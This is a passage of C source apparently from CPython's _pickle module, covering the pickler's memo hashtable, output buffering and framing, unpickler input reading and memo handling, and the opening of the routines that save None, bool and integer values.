PyObject *readline; /* readline() method of the input stream. */
PyObject *peek; /* peek() method of the input stream, or NULL */
char *encoding; /* Name of the encoding to be used for
decoding strings pickled using Python
2.x. The default value is "ASCII" */
char *errors; /* Name of errors handling scheme to used when
decoding strings. The default value is
"strict". */
Py_ssize_t *marks; /* Mark stack, used for unpickling container
objects. */
Py_ssize_t num_marks; /* Number of marks in the mark stack. */
Py_ssize_t marks_size; /* Current allocated size of the mark stack. */
int proto; /* Protocol of the pickle loaded. */
int fix_imports; /* Indicate whether Unpickler should fix
the name of globals pickled by Python 2.x. */
} UnpicklerObject;
typedef struct {
PyObject_HEAD
PicklerObject *pickler; /* Pickler whose memo table we're proxying. */
} PicklerMemoProxyObject;
typedef struct {
PyObject_HEAD
UnpicklerObject *unpickler;
} UnpicklerMemoProxyObject;
/* Forward declarations */
static int save(PicklerObject *, PyObject *, int);
static int save_reduce(PicklerObject *, PyObject *, PyObject *);
static PyTypeObject Pickler_Type;
static PyTypeObject Unpickler_Type;
#include "clinic/_pickle.c.h"
/*************************************************************************
A custom hashtable mapping void* to Python ints. This is used by the pickler
for memoization. Using a custom hashtable rather than PyDict allows us to skip
a bunch of unnecessary object creation. This makes a huge performance
difference. */
#define MT_MINSIZE 8
#define PERTURB_SHIFT 5
static PyMemoTable *
PyMemoTable_New(void)
{
PyMemoTable *memo = PyMem_MALLOC(sizeof(PyMemoTable));
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memo->mt_used = 0;
memo->mt_allocated = MT_MINSIZE;
memo->mt_mask = MT_MINSIZE - 1;
memo->mt_table = PyMem_MALLOC(MT_MINSIZE * sizeof(PyMemoEntry));
if (memo->mt_table == NULL) {
PyMem_FREE(memo);
PyErr_NoMemory();
return NULL;
}
memset(memo->mt_table, 0, MT_MINSIZE * sizeof(PyMemoEntry));
return memo;
}
static PyMemoTable *
PyMemoTable_Copy(PyMemoTable *self)
{
Py_ssize_t i;
PyMemoTable *new = PyMemoTable_New();
if (new == NULL)
return NULL;
new->mt_used = self->mt_used;
new->mt_allocated = self->mt_allocated;
new->mt_mask = self->mt_mask;
/* The table we get from _New() is probably smaller than we wanted.
Free it and allocate one that's the right size. */
PyMem_FREE(new->mt_table);
new->mt_table = PyMem_NEW(PyMemoEntry, self->mt_allocated);
if (new->mt_table == NULL) {
PyMem_FREE(new);
PyErr_NoMemory();
return NULL;
}
for (i = 0; i < self->mt_allocated; i++) {
Py_XINCREF(self->mt_table[i].me_key);
}
memcpy(new->mt_table, self->mt_table,
sizeof(PyMemoEntry) * self->mt_allocated);
return new;
}
static Py_ssize_t
PyMemoTable_Size(PyMemoTable *self)
{
return self->mt_used;
}
static int
PyMemoTable_Clear(PyMemoTable *self)
{
Py_ssize_t i = self->mt_allocated;
while (--i >= 0) {
Py_XDECREF(self->mt_table[i].me_key);
}
self->mt_used = 0;
memset(self->mt_table, 0, self->mt_allocated * sizeof(PyMemoEntry));
return 0;
}
static void
PyMemoTable_Del(PyMemoTable *self)
{
if (self == NULL)
return;
PyMemoTable_Clear(self);
PyMem_FREE(self->mt_table);
PyMem_FREE(self);
}
/* Since entries cannot be deleted from this hashtable, _PyMemoTable_Lookup()
can be considerably simpler than dictobject.c's lookdict(). */
static PyMemoEntry *
_PyMemoTable_Lookup(PyMemoTable *self, PyObject *key)
{
size_t i;
size_t perturb;
size_t mask = (size_t)self->mt_mask;
PyMemoEntry *table = self->mt_table;
PyMemoEntry *entry;
Py_hash_t hash = (Py_hash_t)key >> 3;
i = hash & mask;
entry = &table[i];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
for (perturb = hash; ; perturb >>= PERTURB_SHIFT) {
i = (i << 2) + i + perturb + 1;
entry = &table[i & mask];
if (entry->me_key == NULL || entry->me_key == key)
return entry;
}
Py_UNREACHABLE();
}
/* Returns -1 on failure, 0 on success. */
static int
_PyMemoTable_ResizeTable(PyMemoTable *self, Py_ssize_t min_size)
{
PyMemoEntry *oldtable = NULL;
PyMemoEntry *oldentry, *newentry;
Py_ssize_t new_size = MT_MINSIZE;
Py_ssize_t to_process;
assert(min_size > 0);
/* Find the smallest valid table size >= min_size. */
while (new_size < min_size && new_size > 0)
new_size <<= 1;
if (new_size <= 0) {
PyErr_NoMemory();
return -1;
}
/* new_size needs to be a power of two. */
assert((new_size & (new_size - 1)) == 0);
/* Allocate new table. */
oldtable = self->mt_table;
self->mt_table = PyMem_NEW(PyMemoEntry, new_size);
if (self->mt_table == NULL) {
self->mt_table = oldtable;
PyErr_NoMemory();
return -1;
}
self->mt_allocated = new_size;
self->mt_mask = new_size - 1;
memset(self->mt_table, 0, sizeof(PyMemoEntry) * new_size);
/* Copy entries from the old table. */
to_process = self->mt_used;
for (oldentry = oldtable; to_process > 0; oldentry++) {
if (oldentry->me_key != NULL) {
to_process--;
/* newentry is a pointer to a chunk of the new
mt_table, so we're setting the key:value pair
in-place. */
newentry = _PyMemoTable_Lookup(self, oldentry->me_key);
newentry->me_key = oldentry->me_key;
newentry->me_value = oldentry->me_value;
}
}
/* Deallocate the old table. */
PyMem_FREE(oldtable);
return 0;
}
/* Returns NULL on failure, a pointer to the value otherwise. */
static Py_ssize_t *
PyMemoTable_Get(PyMemoTable *self, PyObject *key)
{
PyMemoEntry *entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key == NULL)
return NULL;
return &entry->me_value;
}
/* Returns -1 on failure, 0 on success. */
static int
PyMemoTable_Set(PyMemoTable *self, PyObject *key, Py_ssize_t value)
{
PyMemoEntry *entry;
assert(key != NULL);
entry = _PyMemoTable_Lookup(self, key);
if (entry->me_key != NULL) {
entry->me_value = value;
return 0;
}
Py_INCREF(key);
entry->me_key = key;
entry->me_value = value;
self->mt_used++;
/* If we added a key, we can safely resize. Otherwise just return!
* If used >= 2/3 size, adjust size. Normally, this quaduples the size.
*
* Quadrupling the size improves average table sparseness
* (reducing collisions) at the cost of some memory. It also halves
* the number of expensive resize operations in a growing memo table.
*
* Very large memo tables (over 50K items) use doubling instead.
* This may help applications with severe memory constraints.
*/
if (!(self->mt_used * 3 >= (self->mt_mask + 1) * 2))
return 0;
return _PyMemoTable_ResizeTable(self,
(self->mt_used > 50000 ? 2 : 4) * self->mt_used);
}
#undef MT_MINSIZE
#undef PERTURB_SHIFT
/*************************************************************************/
static int
_Pickler_ClearBuffer(PicklerObject *self)
{
Py_XSETREF(self->output_buffer,
PyBytes_FromStringAndSize(NULL, self->max_output_len));
if (self->output_buffer == NULL)
return -1;
self->output_len = 0;
self->frame_start = -1;
return 0;
}
static void
_write_size64(char *out, size_t value)
{
size_t i;
Py_BUILD_ASSERT(sizeof(size_t) <= 8);
for (i = 0; i < sizeof(size_t); i++) {
out[i] = (unsigned char)((value >> (8 * i)) & 0xff);
}
for (i = sizeof(size_t); i < 8; i++) {
out[i] = 0;
}
}
static int
_Pickler_CommitFrame(PicklerObject *self)
{
size_t frame_len;
char *qdata;
if (!self->framing || self->frame_start == -1)
return 0;
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
qdata = PyBytes_AS_STRING(self->output_buffer) + self->frame_start;
if (frame_len >= FRAME_SIZE_MIN) {
qdata[0] = FRAME;
_write_size64(qdata + 1, frame_len);
}
else {
memmove(qdata, qdata + FRAME_HEADER_SIZE, frame_len);
self->output_len -= FRAME_HEADER_SIZE;
}
self->frame_start = -1;
return 0;
}
static PyObject *
_Pickler_GetString(PicklerObject *self)
{
PyObject *output_buffer = self->output_buffer;
assert(self->output_buffer != NULL);
if (_Pickler_CommitFrame(self))
return NULL;
self->output_buffer = NULL;
/* Resize down to exact size */
if (_PyBytes_Resize(&output_buffer, self->output_len) < 0)
return NULL;
return output_buffer;
}
static int
_Pickler_FlushToFile(PicklerObject *self)
{
PyObject *output, *result;
assert(self->write != NULL);
/* This will commit the frame first */
output = _Pickler_GetString(self);
if (output == NULL)
return -1;
result = _Pickle_FastCall(self->write, output);
Py_XDECREF(result);
return (result == NULL) ? -1 : 0;
}
static int
_Pickler_OpcodeBoundary(PicklerObject *self)
{
Py_ssize_t frame_len;
if (!self->framing || self->frame_start == -1) {
return 0;
}
frame_len = self->output_len - self->frame_start - FRAME_HEADER_SIZE;
if (frame_len >= FRAME_SIZE_TARGET) {
if(_Pickler_CommitFrame(self)) {
return -1;
}
/* Flush the content of the committed frame to the underlying
* file and reuse the pickler buffer for the next frame so as
* to limit memory usage when dumping large complex objects to
* a file.
*
* self->write is NULL when called via dumps.
*/
if (self->write != NULL) {
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
}
return 0;
}
static Py_ssize_t
_Pickler_Write(PicklerObject *self, const char *s, Py_ssize_t data_len)
{
Py_ssize_t i, n, required;
char *buffer;
int need_new_frame;
assert(s != NULL);
need_new_frame = (self->framing && self->frame_start == -1);
if (need_new_frame)
n = data_len + FRAME_HEADER_SIZE;
else
n = data_len;
required = self->output_len + n;
if (required > self->max_output_len) {
/* Make place in buffer for the pickle chunk */
if (self->output_len >= PY_SSIZE_T_MAX / 2 - n) {
PyErr_NoMemory();
return -1;
}
self->max_output_len = (self->output_len + n) / 2 * 3;
if (_PyBytes_Resize(&self->output_buffer, self->max_output_len) < 0)
return -1;
}
buffer = PyBytes_AS_STRING(self->output_buffer);
if (need_new_frame) {
/* Setup new frame */
Py_ssize_t frame_start = self->output_len;
self->frame_start = frame_start;
for (i = 0; i < FRAME_HEADER_SIZE; i++) {
/* Write an invalid value, for debugging */
buffer[frame_start + i] = 0xFE;
}
self->output_len += FRAME_HEADER_SIZE;
}
if (data_len < 8) {
/* This is faster than memcpy when the string is short. */
for (i = 0; i < data_len; i++) {
buffer[self->output_len + i] = s[i];
}
}
else {
memcpy(buffer + self->output_len, s, data_len);
}
self->output_len += data_len;
return data_len;
}
static PicklerObject *
_Pickler_New(void)
{
PicklerObject *self;
self = PyObject_GC_New(PicklerObject, &Pickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->dispatch_table = NULL;
self->write = NULL;
self->proto = 0;
self->bin = 0;
self->framing = 0;
self->frame_start = -1;
self->fast = 0;
self->fast_nesting = 0;
self->fix_imports = 0;
self->fast_memo = NULL;
self->max_output_len = WRITE_BUF_SIZE;
self->output_len = 0;
self->memo = PyMemoTable_New();
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->memo == NULL || self->output_buffer == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
static int
_Pickler_SetProtocol(PicklerObject *self, PyObject *protocol, int fix_imports)
{
long proto;
if (protocol == NULL || protocol == Py_None) {
proto = DEFAULT_PROTOCOL;
}
else {
proto = PyLong_AsLong(protocol);
if (proto < 0) {
if (proto == -1 && PyErr_Occurred())
return -1;
proto = HIGHEST_PROTOCOL;
}
else if (proto > HIGHEST_PROTOCOL) {
PyErr_Format(PyExc_ValueError, "pickle protocol must be <= %d",
HIGHEST_PROTOCOL);
return -1;
}
}
self->proto = (int)proto;
self->bin = proto > 0;
self->fix_imports = fix_imports && proto < 3;
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Pickler_SetOutputStream(PicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(write);
assert(file != NULL);
if (_PyObject_LookupAttrId(file, &PyId_write, &self->write) < 0) {
return -1;
}
if (self->write == NULL) {
PyErr_SetString(PyExc_TypeError,
"file must have a 'write' attribute");
return -1;
}
return 0;
}
/* Returns the size of the input on success, -1 on failure. This takes its
own reference to `input`. */
static Py_ssize_t
_Unpickler_SetStringInput(UnpicklerObject *self, PyObject *input)
{
if (self->buffer.buf != NULL)
PyBuffer_Release(&self->buffer);
if (PyObject_GetBuffer(input, &self->buffer, PyBUF_CONTIG_RO) < 0)
return -1;
self->input_buffer = self->buffer.buf;
self->input_len = self->buffer.len;
self->next_read_idx = 0;
self->prefetched_idx = self->input_len;
return self->input_len;
}
static int
bad_readline(void)
{
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "pickle data was truncated");
return -1;
}
static int
_Unpickler_SkipConsumed(UnpicklerObject *self)
{
Py_ssize_t consumed;
PyObject *r;
consumed = self->next_read_idx - self->prefetched_idx;
if (consumed <= 0)
return 0;
assert(self->peek); /* otherwise we did something wrong */
/* This makes a useless copy... */
r = PyObject_CallFunction(self->read, "n", consumed);
if (r == NULL)
return -1;
Py_DECREF(r);
self->prefetched_idx = self->next_read_idx;
return 0;
}
static const Py_ssize_t READ_WHOLE_LINE = -1;
/* If reading from a file, we need to only pull the bytes we need, since there
may be multiple pickle objects arranged contiguously in the same input
buffer.
If `n` is READ_WHOLE_LINE, read a whole line. Otherwise, read up to `n`
bytes from the input stream/buffer.
Update the unpickler's input buffer with the newly-read data. Returns -1 on
failure; on success, returns the number of bytes read from the file.
On success, self->input_len will be 0; this is intentional so that when
unpickling from a file, the "we've run out of data" code paths will trigger,
causing the Unpickler to go back to the file for more data. Use the returned
size to tell you how much data you can process. */
static Py_ssize_t
_Unpickler_ReadFromFile(UnpicklerObject *self, Py_ssize_t n)
{
PyObject *data;
Py_ssize_t read_size;
assert(self->read != NULL);
if (_Unpickler_SkipConsumed(self) < 0)
return -1;
if (n == READ_WHOLE_LINE) {
data = _PyObject_CallNoArg(self->readline);
}
else {
PyObject *len;
/* Prefetch some data without advancing the file pointer, if possible */
if (self->peek && n < PREFETCH) {
len = PyLong_FromSsize_t(PREFETCH);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->peek, len);
if (data == NULL) {
if (!PyErr_ExceptionMatches(PyExc_NotImplementedError))
return -1;
/* peek() is probably not supported by the given file object */
PyErr_Clear();
Py_CLEAR(self->peek);
}
else {
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
self->prefetched_idx = 0;
if (n <= read_size)
return n;
}
}
len = PyLong_FromSsize_t(n);
if (len == NULL)
return -1;
data = _Pickle_FastCall(self->read, len);
}
if (data == NULL)
return -1;
read_size = _Unpickler_SetStringInput(self, data);
Py_DECREF(data);
return read_size;
}
/* Don't call it directly: use _Unpickler_Read() */
static Py_ssize_t
_Unpickler_ReadImpl(UnpicklerObject *self, char **s, Py_ssize_t n)
{
Py_ssize_t num_read;
*s = NULL;
if (self->next_read_idx > PY_SSIZE_T_MAX - n) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"read would overflow (invalid bytecode)");
return -1;
}
/* This case is handled by the _Unpickler_Read() macro for efficiency */
assert(self->next_read_idx + n > self->input_len);
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, n);
if (num_read < 0)
return -1;
if (num_read < n)
return bad_readline();
*s = self->input_buffer;
self->next_read_idx = n;
return n;
}
/* Read `n` bytes from the unpickler's data source, storing the result in `*s`.
This should be used for all data reads, rather than accessing the unpickler's
input buffer directly. This method deals correctly with reading from input
streams, which the input buffer doesn't deal with.
Note that when reading from a file-like object, self->next_read_idx won't
be updated (it should remain at 0 for the entire unpickling process). You
should use this function's return value to know how many bytes you can
consume.
Returns -1 (with an exception set) on failure. On success, return the
number of chars read. */
#define _Unpickler_Read(self, s, n) \
(((n) <= (self)->input_len - (self)->next_read_idx) \
? (*(s) = (self)->input_buffer + (self)->next_read_idx, \
(self)->next_read_idx += (n), \
(n)) \
: _Unpickler_ReadImpl(self, (s), (n)))
static Py_ssize_t
_Unpickler_CopyLine(UnpicklerObject *self, char *line, Py_ssize_t len,
char **result)
{
char *input_line = PyMem_Realloc(self->input_line, len + 1);
if (input_line == NULL) {
PyErr_NoMemory();
return -1;
}
memcpy(input_line, line, len);
input_line[len] = '\0';
self->input_line = input_line;
*result = self->input_line;
return len;
}
/* Read a line from the input stream/buffer. If we run off the end of the input
before hitting \n, raise an error.
Returns the number of chars read, or -1 on failure. */
static Py_ssize_t
_Unpickler_Readline(UnpicklerObject *self, char **result)
{
Py_ssize_t i, num_read;
for (i = self->next_read_idx; i < self->input_len; i++) {
if (self->input_buffer[i] == '\n') {
char *line_start = self->input_buffer + self->next_read_idx;
num_read = i - self->next_read_idx + 1;
self->next_read_idx = i + 1;
return _Unpickler_CopyLine(self, line_start, num_read, result);
}
}
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, READ_WHOLE_LINE);
if (num_read < 0)
return -1;
if (num_read == 0 || self->input_buffer[num_read - 1] != '\n')
return bad_readline();
self->next_read_idx = num_read;
return _Unpickler_CopyLine(self, self->input_buffer, num_read, result);
}
/* Returns -1 (with an exception set) on failure, 0 on success. The memo array
will be modified in place. */
static int
_Unpickler_ResizeMemoList(UnpicklerObject *self, Py_ssize_t new_size)
{
Py_ssize_t i;
assert(new_size > self->memo_size);
PyObject **memo_new = self->memo;
PyMem_RESIZE(memo_new, PyObject *, new_size);
if (memo_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->memo = memo_new;
for (i = self->memo_size; i < new_size; i++)
self->memo[i] = NULL;
self->memo_size = new_size;
return 0;
}
/* Returns NULL if idx is out of bounds. */
static PyObject *
_Unpickler_MemoGet(UnpicklerObject *self, Py_ssize_t idx)
{
if (idx < 0 || idx >= self->memo_size)
return NULL;
return self->memo[idx];
}
/* Returns -1 (with an exception set) on failure, 0 on success.
This takes its own reference to `value`. */
static int
_Unpickler_MemoPut(UnpicklerObject *self, Py_ssize_t idx, PyObject *value)
{
PyObject *old_item;
if (idx >= self->memo_size) {
if (_Unpickler_ResizeMemoList(self, idx * 2) < 0)
return -1;
assert(idx < self->memo_size);
}
Py_INCREF(value);
old_item = self->memo[idx];
self->memo[idx] = value;
if (old_item != NULL) {
Py_DECREF(old_item);
}
else {
self->memo_len++;
}
return 0;
}
static PyObject **
_Unpickler_NewMemo(Py_ssize_t new_size)
{
PyObject **memo = PyMem_NEW(PyObject *, new_size);
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memset(memo, 0, new_size * sizeof(PyObject *));
return memo;
}
/* Free the unpickler's memo, taking care to decref any items left in it. */
static void
_Unpickler_MemoCleanup(UnpicklerObject *self)
{
Py_ssize_t i;
PyObject **memo = self->memo;
if (self->memo == NULL)
return;
self->memo = NULL;
i = self->memo_size;
while (--i >= 0) {
Py_XDECREF(memo[i]);
}
PyMem_FREE(memo);
}
static UnpicklerObject *
_Unpickler_New(void)
{
UnpicklerObject *self;
self = PyObject_GC_New(UnpicklerObject, &Unpickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->input_buffer = NULL;
self->input_line = NULL;
self->input_len = 0;
self->next_read_idx = 0;
self->prefetched_idx = 0;
self->read = NULL;
self->readline = NULL;
self->peek = NULL;
self->encoding = NULL;
self->errors = NULL;
self->marks = NULL;
self->num_marks = 0;
self->marks_size = 0;
self->proto = 0;
self->fix_imports = 0;
memset(&self->buffer, 0, sizeof(Py_buffer));
self->memo_size = 32;
self->memo_len = 0;
self->memo = _Unpickler_NewMemo(self->memo_size);
self->stack = (Pdata *)Pdata_New();
if (self->memo == NULL || self->stack == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Unpickler_SetInputStream(UnpicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(peek);
_Py_IDENTIFIER(read);
_Py_IDENTIFIER(readline);
if (_PyObject_LookupAttrId(file, &PyId_peek, &self->peek) < 0) {
return -1;
}
(void)_PyObject_LookupAttrId(file, &PyId_read, &self->read);
(void)_PyObject_LookupAttrId(file, &PyId_readline, &self->readline);
if (self->readline == NULL || self->read == NULL) {
if (!PyErr_Occurred()) {
PyErr_SetString(PyExc_TypeError,
"file must have 'read' and 'readline' attributes");
}
Py_CLEAR(self->read);
Py_CLEAR(self->readline);
Py_CLEAR(self->peek);
return -1;
}
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Unpickler_SetInputEncoding(UnpicklerObject *self,
const char *encoding,
const char *errors)
{
if (encoding == NULL)
encoding = "ASCII";
if (errors == NULL)
errors = "strict";
self->encoding = _PyMem_Strdup(encoding);
self->errors = _PyMem_Strdup(errors);
if (self->encoding == NULL || self->errors == NULL) {
PyErr_NoMemory();
return -1;
}
return 0;
}
/* Generate a GET opcode for an object stored in the memo. */
static int
memo_get(PicklerObject *self, PyObject *key)
{
Py_ssize_t *value;
char pdata[30];
Py_ssize_t len;
value = PyMemoTable_Get(self->memo, key);
if (value == NULL) {
PyErr_SetObject(PyExc_KeyError, key);
return -1;
}
if (!self->bin) {
pdata[0] = GET;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", *value);
len = strlen(pdata);
}
else {
if (*value < 256) {
pdata[0] = BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
len = 2;
}
else if ((size_t)*value <= 0xffffffffUL) {
pdata[0] = LONG_BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
pdata[2] = (unsigned char)((*value >> 8) & 0xff);
pdata[3] = (unsigned char)((*value >> 16) & 0xff);
pdata[4] = (unsigned char)((*value >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINGET");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* Store an object in the memo, assign it a new unique ID based on the number
of objects currently stored in the memo and generate a PUT opcode. */
static int
memo_put(PicklerObject *self, PyObject *obj)
{
char pdata[30];
Py_ssize_t len;
Py_ssize_t idx;
const char memoize_op = MEMOIZE;
if (self->fast)
return 0;
idx = PyMemoTable_Size(self->memo);
if (PyMemoTable_Set(self->memo, obj, idx) < 0)
return -1;
if (self->proto >= 4) {
if (_Pickler_Write(self, &memoize_op, 1) < 0)
return -1;
return 0;
}
else if (!self->bin) {
pdata[0] = PUT;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", idx);
len = strlen(pdata);
}
else {
if (idx < 256) {
pdata[0] = BINPUT;
pdata[1] = (unsigned char)idx;
len = 2;
}
else if ((size_t)idx <= 0xffffffffUL) {
pdata[0] = LONG_BINPUT;
pdata[1] = (unsigned char)(idx & 0xff);
pdata[2] = (unsigned char)((idx >> 8) & 0xff);
pdata[3] = (unsigned char)((idx >> 16) & 0xff);
pdata[4] = (unsigned char)((idx >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINPUT");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
static PyObject *
get_dotted_path(PyObject *obj, PyObject *name)
{
_Py_static_string(PyId_dot, ".");
PyObject *dotted_path;
Py_ssize_t i, n;
dotted_path = PyUnicode_Split(name, _PyUnicode_FromId(&PyId_dot), -1);
if (dotted_path == NULL)
return NULL;
n = PyList_GET_SIZE(dotted_path);
assert(n >= 1);
for (i = 0; i < n; i++) {
PyObject *subpath = PyList_GET_ITEM(dotted_path, i);
if (_PyUnicode_EqualToASCIIString(subpath, "<locals>")) {
if (obj == NULL)
PyErr_Format(PyExc_AttributeError,
"Can't pickle local object %R", name);
else
PyErr_Format(PyExc_AttributeError,
"Can't pickle local attribute %R on %R", name, obj);
Py_DECREF(dotted_path);
return NULL;
}
}
return dotted_path;
}
static PyObject *
get_deep_attribute(PyObject *obj, PyObject *names, PyObject **pparent)
{
Py_ssize_t i, n;
PyObject *parent = NULL;
assert(PyList_CheckExact(names));
Py_INCREF(obj);
n = PyList_GET_SIZE(names);
for (i = 0; i < n; i++) {
PyObject *name = PyList_GET_ITEM(names, i);
Py_XDECREF(parent);
parent = obj;
(void)_PyObject_LookupAttr(parent, name, &obj);
if (obj == NULL) {
Py_DECREF(parent);
return NULL;
}
}
if (pparent != NULL)
*pparent = parent;
else
Py_XDECREF(parent);
return obj;
}
static PyObject *
getattribute(PyObject *obj, PyObject *name, int allow_qualname)
{
PyObject *dotted_path, *attr;
if (allow_qualname) {
dotted_path = get_dotted_path(obj, name);
if (dotted_path == NULL)
return NULL;
attr = get_deep_attribute(obj, dotted_path, NULL);
Py_DECREF(dotted_path);
}
else {
(void)_PyObject_LookupAttr(obj, name, &attr);
}
if (attr == NULL && !PyErr_Occurred()) {
PyErr_Format(PyExc_AttributeError,
"Can't get attribute %R on %R", name, obj);
}
return attr;
}
static int
_checkmodule(PyObject *module_name, PyObject *module,
PyObject *global, PyObject *dotted_path)
{
if (module == Py_None) {
return -1;
}
if (PyUnicode_Check(module_name) &&
_PyUnicode_EqualToASCIIString(module_name, "__main__")) {
return -1;
}
PyObject *candidate = get_deep_attribute(module, dotted_path, NULL);
if (candidate == NULL) {
return -1;
}
if (candidate != global) {
Py_DECREF(candidate);
return -1;
}
Py_DECREF(candidate);
return 0;
}
static PyObject *
whichmodule(PyObject *global, PyObject *dotted_path)
{
PyObject *module_name;
PyObject *module = NULL;
Py_ssize_t i;
PyObject *modules;
_Py_IDENTIFIER(__module__);
_Py_IDENTIFIER(modules);
_Py_IDENTIFIER(__main__);
if (_PyObject_LookupAttrId(global, &PyId___module__, &module_name) < 0) {
return NULL;
}
if (module_name) {
/* In some rare cases (e.g., bound methods of extension types),
__module__ can be None. If it is so, then search sys.modules for
the module of global. */
if (module_name != Py_None)
return module_name;
Py_CLEAR(module_name);
}
assert(module_name == NULL);
/* Fallback on walking sys.modules */
modules = _PySys_GetObjectId(&PyId_modules);
if (modules == NULL) {
PyErr_SetString(PyExc_RuntimeError, "unable to get sys.modules");
return NULL;
}
if (PyDict_CheckExact(modules)) {
i = 0;
while (PyDict_Next(modules, &i, &module_name, &module)) {
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_INCREF(module_name);
return module_name;
}
if (PyErr_Occurred()) {
return NULL;
}
}
}
else {
PyObject *iterator = PyObject_GetIter(modules);
if (iterator == NULL) {
return NULL;
}
while ((module_name = PyIter_Next(iterator))) {
module = PyObject_GetItem(modules, module_name);
if (module == NULL) {
Py_DECREF(module_name);
Py_DECREF(iterator);
return NULL;
}
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_DECREF(module);
Py_DECREF(iterator);
return module_name;
}
Py_DECREF(module);
Py_DECREF(module_name);
if (PyErr_Occurred()) {
Py_DECREF(iterator);
return NULL;
}
}
Py_DECREF(iterator);
}
/* If no module is found, use __main__. */
module_name = _PyUnicode_FromId(&PyId___main__);
Py_XINCREF(module_name);
return module_name;
}
/* fast_save_enter() and fast_save_leave() are guards against recursive
objects when Pickler is used with the "fast mode" (i.e., with object
memoization disabled). If the nesting of a list or dict object exceed
FAST_NESTING_LIMIT, these guards will start keeping an internal
reference to the seen list or dict objects and check whether these objects
are recursive. These are not strictly necessary, since save() has a
hard-coded recursion limit, but they give a nicer error message than the
typical RuntimeError. */
static int
fast_save_enter(PicklerObject *self, PyObject *obj)
{
/* if fast_nesting < 0, we're doing an error exit. */
if (++self->fast_nesting >= FAST_NESTING_LIMIT) {
PyObject *key = NULL;
if (self->fast_memo == NULL) {
self->fast_memo = PyDict_New();
if (self->fast_memo == NULL) {
self->fast_nesting = -1;
return 0;
}
}
key = PyLong_FromVoidPtr(obj);
if (key == NULL) {
self->fast_nesting = -1;
return 0;
}
if (PyDict_GetItemWithError(self->fast_memo, key)) {
Py_DECREF(key);
PyErr_Format(PyExc_ValueError,
"fast mode: can't pickle cyclic objects "
"including object type %.200s at %p",
obj->ob_type->tp_name, obj);
self->fast_nesting = -1;
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
if (PyDict_SetItem(self->fast_memo, key, Py_None) < 0) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
fast_save_leave(PicklerObject *self, PyObject *obj)
{
if (self->fast_nesting-- >= FAST_NESTING_LIMIT) {
PyObject *key = PyLong_FromVoidPtr(obj);
if (key == NULL)
return 0;
if (PyDict_DelItem(self->fast_memo, key) < 0) {
Py_DECREF(key);
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
save_none(PicklerObject *self, PyObject *obj)
{
const char none_op = NONE;
if (_Pickler_Write(self, &none_op, 1) < 0)
return -1;
return 0;
}
static int
save_bool(PicklerObject *self, PyObject *obj)
{
if (self->proto >= 2) {
const char bool_op = (obj == Py_True) ? NEWTRUE : NEWFALSE;
if (_Pickler_Write(self, &bool_op, 1) < 0)
return -1;
}
else {
/* These aren't opcodes -- they're ways to pickle bools before protocol 2
* so that unpicklers written before bools were introduced unpickle them
* as ints, but unpicklers after can recognize that bools were intended.
* Note that protocol 2 added direct ways to pickle bools.
*/
const char *bool_str = (obj == Py_True) ? "I01\n" : "I00\n";
if (_Pickler_Write(self, bool_str, strlen(bool_str)) < 0)
return -1;
}
return 0;
}
static int
save_long(PicklerObject *self, PyObject *obj)
{
PyObject *repr = NULL;
Py_ssize_t size;
long val;
int overflow;
int status = 0;
val= PyLong_AsLongAndOverflow(obj, &overflow);
if (!overflow && (sizeof(long) <= 4 ||
(val <= 0x7fffffffL && val >= (-0x7fffffffL - 1))))
{
/* result fits in a signed 4-byte integer.
Note: we can't use -0x80000000L in the above condition because some
compilers (e.g., MSVC) will promote 0x80000000L to an unsigned type
before applying the unary minus when sizeof(long) <= 4. The
resulting value stays unsigned which is commonly not what we want,
so MSVC happily warns us about it. However, that result would have
been fine because we guard for sizeof(long) <= 4 which turns the
condition true in that particular case. */
char pdata[32];
Py_ssize_t len = 0;
if (self->bin) {
pdata[1] = (unsigned char)(val & 0xff);
